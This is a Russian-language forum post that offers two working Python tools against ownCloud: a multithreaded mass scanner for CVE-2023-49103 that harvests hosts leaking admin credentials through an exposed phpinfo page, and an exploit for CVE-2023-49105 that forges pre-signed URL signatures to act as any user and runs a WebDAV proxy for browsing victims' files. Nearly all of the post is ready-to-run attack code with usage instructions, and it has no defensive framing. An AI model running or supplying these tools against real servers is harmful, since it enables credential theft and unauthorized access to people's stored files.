- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
Чекер на CVE-2023-49103
Python:
#Установить зависимости pip install requests urllib3 colorama alive-progress
#Использование python exploit.py -t input_file.txt -o output_file.txt
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
import argparse
import queue
from alive_progress import alive_bar
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_phpinfo(url):
    """Return True if *url* serves a phpinfo dump leaking ownCloud admin
    environment variables (CVE-2023-49103), else False.

    Any network-level failure is treated as "not vulnerable".
    """
    try:
        # verify=False: targets frequently use self-signed certificates.
        # timeout added so a single unresponsive host cannot stall a
        # worker thread indefinitely during a mass scan.
        response = requests.get(url, verify=False, timeout=10)
        # The leaked phpinfo output exposes environment variables such as
        # OWNCLOUD_ADMIN_USERNAME / OWNCLOUD_ADMIN_PASSWORD.
        if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text:
            return True
    except requests.RequestException:
        # Connection errors, timeouts, bad TLS, etc. — report as invalid.
        pass
    return False
def process_urls(url_queue, output_file, update_bar):
    """Worker loop: consume URLs from *url_queue* until a ``None`` sentinel
    arrives, append confirmed hits to *output_file*, and advance the
    shared progress bar once per URL.
    """
    with open(output_file, 'a') as results:
        while True:
            url = url_queue.get()
            # None is the shutdown sentinel pushed by the producer.
            if url is None:
                url_queue.task_done()
                return
            try:
                hit = check_phpinfo(url)
                if hit:
                    print(Fore.GREEN + "Valid: " + url + Style.RESET_ALL)
                    results.write(url + '\n')
                else:
                    print(Fore.RED + "Invalid: " + url + Style.RESET_ALL)
            except Exception as e:
                # Keep the worker alive on unexpected errors.
                print(Fore.YELLOW + f"Error processing {url}: {e}" + Style.RESET_ALL)
            finally:
                url_queue.task_done()
                update_bar()
def process_file(file_path, output_file):
    """Read base URLs from *file_path*, expand each into both known
    CVE-2023-49103 phpinfo paths, and scan them concurrently, appending
    vulnerable URLs to *output_file*.
    """
    # Both common deployment layouts are probed: /owncloud sub-path and
    # a plain web-root install.
    vuln_paths = (
        "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css",
        "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css",
    )
    urls = []
    with open(file_path, 'r') as file:
        for line in file:
            base_url = line.strip()
            if not base_url:
                # Skip blank lines: previously they produced bogus
                # host-less "URLs" consisting of just the path.
                continue
            for path in vuln_paths:
                urls.append(base_url + path)

    if not urls:
        # ThreadPoolExecutor raises ValueError for max_workers=0, so bail
        # out early when the input file yields nothing to scan.
        print("No URLs to process.")
        return

    url_queue = queue.Queue()
    num_workers = min(100, len(urls))  # Adjust based on your system's capabilities
    with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
        with ThreadPoolExecutor(max_workers=num_workers) as executor:
            # Start worker threads.
            for _ in range(num_workers):
                executor.submit(process_urls, url_queue, output_file, bar)
            # Feed the queue, then one sentinel per worker to stop them.
            for url in urls:
                url_queue.put(url)
            for _ in range(num_workers):
                url_queue.put(None)
            url_queue.join()  # Wait for all tasks to be completed
if __name__ == "__main__":
    # CLI: -t input file of base URLs, -o output file for confirmed hits.
    parser = argparse.ArgumentParser(description='Process some URLs.')
    parser.add_argument('-t', '--target', required=True, help='Input file with URLs')
    parser.add_argument('-o', '--output', required=True, help='Output file for valid URLs')
    cli_args = parser.parse_args()
    process_file(cli_args.target, cli_args.output)
Скачиваем ten
Для просмотра ссылки войдите или зарегистрируйтесь.
cd ten
poetry install
Запускаем
poetry shell
Эксплоит для CVE-2023-49105
Python:
#Использование (через ten) python exploit.py http://target.com admin
import hashlib
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from ten import *
from tenlib.transform import url as turl
@entry
def main(url: str, username: str, listen: str = "localhost:8800") -> None:
    """Run a local HTTP proxy that rewrites every request with OC-*
    parameters and a forged signature for *username*, then forwards it
    to the ownCloud target at *url* (CVE-2023-49105).
    """
    # Wire the handler class up with a session scoped to the target.
    ProxyHandler.session = ScopedSession(url)
    # ProxyHandler.session.burp()
    ProxyHandler.username = username

    # Tell the operator where to point a WebDAV client.
    msg_success(f"Proxy server running on {listen}")
    dav_url = f"dav://anonymous@{listen}/remote.php/dav"
    msg_info(f"Browse user files: {dav_url}/files/{username}")
    msg_info(f"Browse everything: {dav_url}")

    host, port = listen.split(":")
    server = ThreadingHTTPServer((host, int(port)), ProxyHandler)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        msg_failure("Shutting down the proxy server.")
        server.server_close()
class ProxyHandler(SimpleHTTPRequestHandler):
    """Relays every incoming request to the ownCloud target after
    appending OC-* query parameters and a matching signature.
    """

    # Both attributes are populated by main() before the server starts.
    session = ScopedSession
    username: str

    def do_ANY(self):
        # Fix bug where ownCloud does not realize /remote.php/dav is equal to
        # /remote.php/dav/ and raises an error
        if self.path == "/remote.php/dav":
            self.path += "/"

        # Rewrite the request URL with OC-* params and a signature.
        url = build_signed_url(
            self.command, self.username, self.session.get_absolute_url(self.path)
        )

        # Copy the client's headers, fixing Host to match the upstream target.
        headers = {header: self.headers[header] for header in self.headers}
        headers["Host"] = turl.parse(url).netloc

        # TODO stream input
        if size := int(self.headers.get("Content-Length", 0)):
            data = self.rfile.read(size)
        else:
            data = None

        response = self.session.request(
            self.command, url, headers=headers, data=data, stream=True
        )

        # Relay status and headers, then stream the body in 8 KiB chunks.
        self.send_response(response.status_code)
        for header, value in response.headers.items():
            self.send_header(header, value)
        self.end_headers()
        for chunk in response.iter_content(chunk_size=8192):
            if chunk:
                self.wfile.write(chunk)

    # Every HTTP/WebDAV verb is proxied identically.
    do_OPTIONS = do_ANY
    do_GET = do_ANY
    do_HEAD = do_ANY
    do_POST = do_ANY
    do_PUT = do_ANY
    do_DELETE = do_ANY
    do_TRACE = do_ANY
    do_COPY = do_ANY
    do_LOCK = do_ANY
    do_MKCOL = do_ANY
    do_MOVE = do_ANY
    do_PROPFIND = do_ANY
    do_PROPPATCH = do_ANY
    do_UNLOCK = do_ANY
def compute_hash(url: str) -> str:
    """Return the hex PBKDF2-HMAC-SHA512 signature of *url* (32-byte key
    stretch, 10000 iterations).

    The signing key is the empty string: this mirrors ownCloud's fallback
    when no signing key is configured, which is what makes the signature
    forgeable (CVE-2023-49105).
    """
    return hashlib.pbkdf2_hmac(
        "sha512", url.encode(), b"", 10000, dklen=32
    ).hex()
def build_signed_url(method: str, username: str, url: str) -> str:
    """Return *url* augmented with OC-* query parameters and an
    OC-Signature so the target accepts it as a pre-signed URL.
    """
    parsed = turl.parse(url)
    params = qs.parse(parsed.query)

    # Pre-signed-URL parameters expected by ownCloud.
    params["OC-Credential"] = username
    params["OC-Verb"] = method
    params["OC-Expires"] = "1000"
    params["OC-Date"] = ""

    # The signature covers the URL including the OC-* params but
    # excluding the signature itself: serialize once, sign, append.
    parsed = parsed._replace(query=qs.unparse(params))
    params["OC-Signature"] = compute_hash(turl.unparse(parsed))
    parsed = parsed._replace(query=qs.unparse(params))
    return turl.unparse(parsed)
main()
Для просмотра ссылки войдите или зарегистрируйтесь.